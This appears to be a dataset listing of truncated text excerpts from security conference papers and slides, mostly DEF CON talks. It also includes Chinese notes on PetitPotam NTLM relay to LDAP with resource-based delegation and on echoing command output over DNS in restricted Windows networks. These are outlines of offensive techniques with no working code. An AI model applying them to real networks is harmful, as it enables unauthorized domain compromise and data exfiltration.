white lists, secure remote
desktops in 20 seconds
Zoltan Balazs
DEF CON 22, 2014
root@kali:~# whoami
Zoltán Balázs
root@kali:~# whoami
root@kali:~# whoami
AV testing
AV bypass
root@kali:~# whoami
OSCP: Occasional Satire Captain Punk
CISSP: Certified Interspecie-ial Sheep Shearing Profess... | pdf |
Before the
FEDERAL COMMUNICATIONS COMMISSION
Washington, DC 20554
In the Matter of
)
)
Unlicensed Operation in the TV Broadcast
)
ET Docket No. 04-186
Bands
)
)
ET Docket No. 02-380
Additional Spectrum for Unlicensed Devices
)
Below 900 MHz and in the 3 GHz Band
)
To:
The Commission
JOINT COMMENTS... | pdf |
Page 1 of 37
Whitepaper: Bypassing Port Security In 2018 – Defeating MACsec and 802.1x-2010
DEF CON 26 Pre-Release Version
Gabriel Ryan (@s0lst1c3)
August 2018
Last Modified: 7/20/18 6:44:00 AM
Page 2 of 37
Disclaimer and Updates
This whitepaper is an early version designed for pre-release prior to DEF CON 26. ... | pdf |
PetitPotam配合基于资源委派的横向技巧
原理:使用PetitPotam将目标主机的身份认证中继到dc的ldap服务配置资源委派,然后使用资源
委派获取目标主机权限。
当微软修复CVE-2019-1040的时候,顺便修了smb中继到ldap。
但是我们还能通过http中继到ldap,但前提条件是目标打开Webclient服务,server默认不安装,
win7,win10默认安装但是需要手动打开服务。
条件:
域账户一个
目标主机需要打开Webclient服务
细节:
PetitPotam可以发起http请求,然后将http中继到ldap
http中继需要使用可信域名,域内dns即为可信域名
环境:
DC:192.168.60... | pdf |
从S-SDLC视角看API安全
【API威胁检测防御】专题研讨会
Silver Zhang
为何将API安全拧出来说
为何将API安全拧出来说
感冒 VS. 禽流感
感冒 VS. 禽流感
应用安全 VS. 移动安全
应用安全 VS. 移动安全
新业态
新业态
API历史沿革及风险评估
API面临的安全挑战
传输
存储
认证
授权
输入
输出
➢
客
户
端
不
支
持
加
密
传
输
协
议
怎
么
办
➢
客
户
需
要
走
非
加
密
支
持
代
理
➢
客
户
端
未
做
服
务
端
证
书
合
法
有
效
性
校
验
怎
么
办
➢
服
务
端
加
密
数
据
如
何
让
客
户
端
解
密
➢
客
户
的
服
务
端
与
... | pdf |
Web server botnets and hosting
farms as attack platforms
Gadi Evron – Beyond Security
defcon 15 , 2007
About me
Who I am..
What do I do..
Where do I work..
Regular malware
Often…
Platform specific (Architecture, OS)
Propagates by the use of:
Vulnerabilities (web server, mail client, remote
accessible service)
... | pdf |
CTF 微⼼心得
ddaa
Who am I
• dada = ddaa = 0xddaa = 達達 != ⼤大⼤大
• Start to play CTF since last year
• One of the members in HITCON CTF team.
3
故事的開始是這樣的
⼤大四跨校選課,選修程式安全
http://wargame.cs.nctu.edu.tw
Copyright ©2012 SQlab
4
幹,好難
(助教可以給更多 hint 嗎 T_T)
5
6
結果研究所不⼩小⼼心進了 SQLab……
學⻑⾧長:”你們也有報名 HITCON ?
... | pdf |
Harm Reduction
A Framework For Effective & Compassionate
Security Guidance
Kyle Tobener
Blackhat 2022
Tiktok: @kyle.tobener
Twitter: @kylekyle
Story time
DARE, Every 15, and similar programs
likely increase alcohol intake.
Why am I telling you this?
Imagine that was your security program
I want to help you give
be... | pdf |
Module 2
Typical goals of malware and their
implementations
https://github.com/hasherezade/malware_training_vol1
Dissecting a Banking Trojan
Banking Trojans - families
• Zbots – (a family of various forks of the ZeuS code)
• IcedID
• Tinba
• Gozi (and Gozi-based)
• Kronos
• TrickBot (some of the modules)
• ...and othe... | pdf |
QARK
Who are we?
APK structure
Reversing APKs
Components
Communications
What’s (still) wrong with
Android?
What is QARK?
What QARK is not (yet)
QARK motivation
QARK’s mission
Under the hood
What does QARK do?
Tying it all together
What else?
Then what?
What else?
The fun part
Demo time!
Future plans
Where to get QARK?... | pdf |
1
The state of web application
security
2012
Robert Rowley
Security Architect
DreamHost
Robert.Rowley@DreamHost.com
1
Break Down
Attack Trends
Attacker Motivation
Auditing Backdoors
2
Trends
3
Collecting data
Web Application Firewall (mod_security)
Running on 1,000,000+ websites
Centralized loggin... | pdf |
John Shaw, Wisconsin DOT, 2013
Federal Highway Administration, 2013
Non-Significant Address Part (NAP)
Upper Address Part (UAP)
Lower Address Part (LAP)
00:00
09
4E:22:19
Manufacturer-assigned, irrelevant
Can be derived from traffic
Sent in every packet
University of Washington STAR Lab
Washington State Transportation ... | pdf |
BYO-Disaster
Why Corporate Wireless Still Sucks!
We’re just nerds with random ideas and
inconsistent results!
djwishbone
PuNk1nPo0p
Why you should stay!
What
Obtain Clear-Text
credentials from any PEAP
enabled WPA2-Enterprise
Network without cracking a
single HASH.
Get access to a new set of
tools t... | pdf |
S-hessian反序列化
介绍
自己不会查吗?
这里有一个点就是Hessian的序列化与反序列化与原生序列化与反序列化不同,就以使用的Resin链而言,其中的ja
vax.naming.spi.ContinuationDirContext类并没有实现java.io.Serializable接口,但是hessian还是可以
正常对他进行序列化,用原生的序列化方式就会失败。区别就在于序列化对象时的一个设置,可以让未继承java.i
o.Serializable接口的类进行序列化。
使用
hessian的使用有很多场景,也结合了 servlet和 spring,这里的使用先使用自行封装,然后调试分析漏洞成因,
最后再看整合后的集中情况。... | pdf |
The Commercial Malware Industry
Peter Gutmann
University of Auckland
Some History: The Numbers Racket
The numbers racket = Lotto before the government took it
over
• Run through barber shops, groceries by local operators
• Bets were for cents
• Players chose a 3-digit number
• “Drawn” using the last 3 digits of the to... | pdf |
Shell is Only the Beginning——后渗透阶段的攻防对抗
3gstudent & Evi1cg
As a offensive researcher, if you can dream it,someone has likely already done it and that someone isn’t the kind of
person who speaks at security cons…
——Matt Graeber
3gstudent
Good$Study
Good$Health
Good$Attitude$
Evi1cg
Thin
WhiteHat
Security$Researcher
... | pdf |
The spear to break the
security wall of S7CommPlus
CHENG LEI , NSFOCUS
Related Work
• Dillon Beresford. Exploiting Siemens Simatic S7 PLCs.
Black Hat 2011 USA.
S7Comm protocol
• Ralf Spenneberg et. al.
PLC-Blaster: A Worm Living Solely in the PLC. Black Hat
2016 USA
Early S7CommPlus protoco... | pdf |
Defcon 25
The Internet Already Knows I’m Pregnant
Kashmir Hill - kashmir.hill@gizmodomedia.com - @kashhill
Cooper Quintin - cooperq@eff.org - @cooperq
Defcon 25
Intro
Kashmir
• Journalist
• Privacy Expert
• New Mother
Cooper
• Hacker
• Privacy Activist
• Cares about privacy
issues for people with
wombs
Defcon 25
Sk... | pdf |
-
0.
1
1
2
3
(
• lSIXe14BC
065
• 44Al
Xe
• X1
• U
• NA5
• lrQ0
b
• 0iT
• ku
t
• g
vDm
• H
NP
• lo
dM
• ax13
v
• 2n404
•
G
4
• rZbla
EAFm
• ew
• U8BAF
• B88FPir
• h1F
3E8FPi
n
• R88t
R
• rEF
TNc
• E3
• T
f
• osd51.BEE
E3
• h2E9DEEw
• RZ7FEBEED
OW
• 1RkNC803
• 3EB8F6Dg0FED
S
5
(3102r
Ø9VS
Ør3ai
l(3102 032a99n
l9l... | pdf |
Tor: The Second-Generation Onion Router
Roger Dingledine
The Free Haven Project
arma@freehaven.net
Nick Mathewson
The Free Haven Project
nickm@freehaven.net
Paul Syverson
Naval Research Lab
syverson@itd.nrl.navy.mil
Abstract
We present Tor, a circuit-based low-latency anonymous com-
munication service. This second-gene... | pdf |
物聯網 BLE 認證機制設計的挑戰
以 Gogoro Smart Scooter 為例
GD、CSC
台灣科技大學 資管所
隱私與風險管理實驗室
講師介紹
G D
•
台灣科技大學 資管所 碩士生
•
Team T5 CTO (Chief Food Officer)
•
CHROOT Member
•
曾任
•
到處打零工
•
好學生乖小孩
•
數位鑑識、事件處理、威脅情資整合
•
走在路上偶爾踢到一些漏洞
去年 Synology 送我一台 NAS
希望 Gogoro 也能這麼 nice XD
CSC
•
台灣科技大學 資管所 副教授
•
夠麻吉股份有限公司 獨立董事
•
台灣大學 資訊管理 博士
•
曾任
•
資誠企業管理顧問股份... | pdf |
KinectASploit
What if you took a
kinect
KinectASploit
Used it's skeleton
tracking feature:
KinectASploit
Sprinkled in some
hacking tools:
KinectASploit
And combined them
with a 3D Game Engine:
Lets find out!
Come see the Demo at
Defcon19 and look for the tool
source at:
http://p0wnlabs.com/defcon19
Any graphics ... | pdf |
HUNT
@jhaddix
@swagnetow
@FatihEgbatan
@digitalwoot
@_Sha128
@bugcrowd
Data Driven Web Hacking & Manual Testing
Contribs
Motley crew at @bugcrowd
➔ SecOps & Security Engineering groups
➔ Bughunters, Pentesters, Code Analysis, ++
➔ Burp Suite fans
The Problem(z)
1. Increasingly large and
complicated Web Applications.
... | pdf |
Hacker'Machine,Interface,
State,of,the,Union,for,SCADA,HMI,Vulnerabili:es,
Copyright,2016,Trend,Micro,Inc.,
2,
Introduc:on,
Copyright,2016,Trend,Micro,Inc.,
3,
Trend,Micro,Zero,Day,Ini:a:ve,
• Fritz,Sands,',@FritzSands,
– Security)Researcher)–)Zero)Day)Ini4a4ve)
– Root)cause)analysis)and)vulnerability)discovery)
– ... | pdf |
>>
0 >>
1 >>
2 >>
3 >>
4 >>
Making of
The DEFCON Documentary
Jason Scott & Rachel Lovinger
DEF CON 21, August 2, 2013
>>
0 >>
1 >>
2 >>
3 >>
4 >>
e
f
g
h
I. HOW IT BEGAN
>>
0 >>
1 >>
2 >>
3 >>
4 >>
>>
0 >>
1 >>
2 ... | pdf |
Fuzz 大法之挖掘潜在的逻辑越权
Author:Vulkey_Chen
Blog:gh0st.cn
小密圈:Web 安全 SzS
对一个网站做测试的时候发现了这样一条请求:
这条请求返回的信息是个人信息(用户 ID、手机号、密码)
{"responseData":{"userid":"用户 id","login":"用户名","password":"密码","mobilenum":"手机号
","mobileisbound":"01","email":null}}
一开始的想法是变为 GET 请求(可行),然后增加 JSONP 劫持的回调参数。。。(失败)
之前也有人问我怎么去做参数字典的收集:
A. 注意网站参... | pdf |
Windows下DNS出⽹的命令回显技巧.md
2022/6/30
1 / 9
Windows下DNS出⽹的命令回显技巧
最近遇⻅了很多仅DNS出⽹的极限环境,简单研究了个还算通⽤的利⽤DNSLog的回显Trick,全当抛砖引
⽟,不喜勿喷。
0x00 前⾔
在实战中,命令执⾏总能遇⻅各种各样的环境,⽆回显且仅DNS出⽹的环境也能占个⼤多数。仅DNS出⽹的
环境⼀般利⽤编码+DNSLog就可以解决回显问题。
通⽤指的是在server2003(⽆powershell)环境也能⽤。
windows⾃带的encode只有certutil
Windows下DNS出⽹的命令回显技巧.md
2022/6/30
2 / 9
certutil⾃带了... | pdf |
Security Research over
Windows
[ kernel ]
Draft v.1.1
$whoami
• @zer0mem ~ Peter Hlavaty
• Senior Security Researcher at KeenLab, Tencent
• MSRC100, pwn2own
• Focus : kernel / hyperv / mitigations
• sometimes talk somewhere ..
• wushu player +- ☺
Sandbox
• Restrict resources of target ( process )
• #syscalls
• file sy... | pdf |
Hacking Wireless Networks of the Future:
Security in Cognitive Radio Networks
Hunter Scott / August 3, 2013
Radio
+
Software Defined Radio
Cognitive Radio
+
Cognitive Radio Network
Cognitive Engine
Center Frequency
Bandwidth
Transmit power
Type of modulation
Coding rate
Channel access protocol
Encryptio... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.